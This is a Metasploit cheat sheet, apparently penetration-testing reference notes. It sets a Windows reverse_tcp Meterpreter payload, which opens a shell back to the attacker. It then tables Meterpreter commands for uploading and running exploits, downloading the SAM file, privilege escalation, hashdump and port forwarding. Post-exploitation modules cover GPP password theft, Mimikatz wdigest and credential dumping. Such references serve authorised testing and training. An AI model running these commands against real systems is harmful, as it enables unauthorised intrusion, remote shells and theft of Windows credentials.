# Metasploit

Windows reverse Meterpreter payload:

`set payload windows/meterpreter/reverse_tcp`

## Useful Meterpreter commands

| Command                                   | Description                                                            |
| ----------------------------------------- | ---------------------------------------------------------------------- |
| upload file c:\\\windows                  | Meterpreter upload file to Windows target                              |
| download c:\\\windows\\\repair\\\sam /tmp | Meterpreter download file from Windows target                          |
| execute -f c:\\\windows\temp\exploit.exe  | Meterpreter run .exe on target - handy for executing uploaded exploits |
| execute -f cmd -c                         | Creates new channel with cmd shell                                     |
| ps                                        | Meterpreter show processes                                             |
| shell                                     | Meterpreter get shell on the target                                    |
| getsystem                                 | Meterpreter attempts privilege escalation on the target                |
| hashdump                                  | Meterpreter attempts to dump the hashes on the target                  |
| portfwd add -l 3389 -p 3389 -r target     | Meterpreter create port forward to target machine                      |
| portfwd delete -l 3389 -p 3389 -r target  | Meterpreter delete port forward                                        |

## Post Exploit Windows Metasploit Modules

Windows Metasploit modules for privilege escalation.

| Command                                            | Description                                                                        |
| -------------------------------------------------- | ---------------------------------------------------------------------------------- |
| run post/windows/gather/win\_privs                 | Metasploit show privileges of current user                                         |
| use post/windows/gather/credentials/gpp            | Metasploit grab GPP saved passwords                                                |
| load mimikatz -> wdigest                           | Metasploit load Mimikatz                                                           |
| run post/windows/gather/local\_admin\_search\_enum | Identify other machines that the supplied domain user has administrative access to |
| run post/windows/gather/smart\_hashdump            | dump credentials                                                                   |

